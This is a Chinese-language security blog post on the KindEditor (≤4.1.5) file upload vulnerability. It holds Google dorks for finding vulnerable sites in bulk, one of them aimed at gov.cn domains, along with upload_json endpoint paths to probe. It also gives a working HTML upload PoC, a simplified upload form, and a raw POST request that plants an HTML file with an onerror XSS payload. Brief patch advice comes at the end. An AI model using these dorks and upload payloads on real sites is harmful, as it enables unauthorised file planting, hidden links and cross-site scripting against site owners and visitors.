0x00 漏洞描述
漏洞存在于kindeditor编辑器里,你能上传.txt和.html文件,支持php/asp/jsp/asp.net,漏洞存在于小于等于kindeditor4.1.5编辑器中
这里html里面可以嵌套暗链接地址以及嵌套xss。Kindeditor上的uploadbutton.html用于文件上传功能页面,直接POST到/upload_json.*?dir=file,在允许上传的文件扩展名中包含htm,txt:extTable.Add(“file”,”doc,docx,xls,xlsx,ppt,htm,html,txt,zip,rar,gz,bz2”)
0x01 批量搜索
在google中批量搜索:
1
2
3
4
5
6
7
8
9
10
11
|
inurl:/examples/uploadbutton.html
inurl:/php/upload_json.php
inurl:/asp.net/upload_json.ashx
inurl://jsp/upload_json.jsp
inurl://asp/upload_json.asp
inurl:gov.cn/kindeditor/
|
0x02 漏洞问题
根本脚本语言自定义不同的上传地址,上传之前有必要验证文件 upload_json.* 的存在
1
2
3
4
5
6
7
|
/asp/upload_json.asp
/asp.net/upload_json.ashx
/jsp/upload_json.jsp
/php/upload_json.php
|
可目录变量查看是否存在那种脚本上传漏洞:
1
2
3
4
5
6
7
|
kindeditor/asp/upload_json.asp?dir=file
kindeditor/asp.net/upload_json.ashx?dir=file
kindeditor/jsp/upload_json.jsp?dir=file
kindeditor/php/upload_json.php?dir=file
|
0x03 漏洞利用
google搜素一些存在的站点 inurl:kindeditor
1.查看版本信息
http://www.xxx.org/kindeditor//kindeditor.js
![image-20210104185315467]()
2.版本是4.1.10可以进行尝试如下路径是否存在有必要验证文件 upload_json.*
1
2
3
4
5
6
7
|
kindeditor/asp/upload_json.asp?dir=file
kindeditor/asp.net/upload_json.ashx?dir=file
kindeditor/jsp/upload_json.jsp?dir=file
kindeditor/php/upload_json.php?dir=file
|
3.如下图可以看出是存在jsp上传点:
http://www.xxx.org/kindeditor/jsp/upload_json.jsp?dir=file
![image-20210104185513772]()
4.构造上传poc
这里需要修改<script>...<script>以及url : 的内容,根据实际情况修改.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
|
<html><head>
<title>Uploader</title>
<script src="http://www.xxx.org/kindeditor//kindeditor.js"></script>
<script>
KindEditor.ready(function(K) {
var uploadbutton = K.uploadbutton({
button : K('#uploadButton')[0],
fieldName : 'imgFile',
url : 'http://www.xxx.org/kindeditor/jsp/upload_json.jsp?dir=file',
afterUpload : function(data) {
if (data.error === 0) {
var url = K.formatUrl(data.url, 'absolute');
K('#url').val(url);}
},
});
uploadbutton.fileBox.change(function(e) {
uploadbutton.submit();
});
});
</script></head><body>
<div class="upload">
<input class="ke-input-text" type="text" id="url" value="" readonly="readonly" />
<input type="button" id="uploadButton" value="Upload" />
</div>
</body>
</html>
|
简化版:
1
2
3
4
5
6
7
8
9
|
<form enctype="multipart/form-data" action="http://127.0.0.1/kindeditor/jsp/upload_json.jsp?dir=file" method="post">
Upload a new file:<br>
<input type="file" name="imgFile" size="50"><br>
<input type="submit" value="Upload">
</form>
|
其中的关键是imgFile参数,与js并无关系。
5.用浏览器打开,然后开启bupsuit进行拦截发送,可以看到成功上传txt文件
![image-20210104194459525]()
数据包:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
|
POST /kindeditor/jsp/upload_json.jsp?dir=file HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------18467633426500
Content-Length: 220
Connection: close
Cookie: JSESSIONID=E3C0B32A01F496F452C8B2C3BE609396; loginLogCookie=59e34572-c362-4953-92ce-d8181b860bc0
Upgrade-Insecure-Requests: 1
-----------------------------18467633426500
Content-Disposition: form-data; name="imgFile"; filename="xss.html"
Content-Type: text/html
<img src=q onerror=alert(111)>
-----------------------------18467633426500--
|
返回如下:
![image-20210104194435850]()
访问:127.0.0.1/attached/file/20210104/20210104194243_465.html
![image-20210104194619558]()
0x04 漏洞修复
1.直接删除upload_json.和file_manager_json.
2.升级kindeditor到最新版本
https://www.cnblogs.com/backlion/p/10421405.html
FROM :b0urne.top | Author:b0urne
评论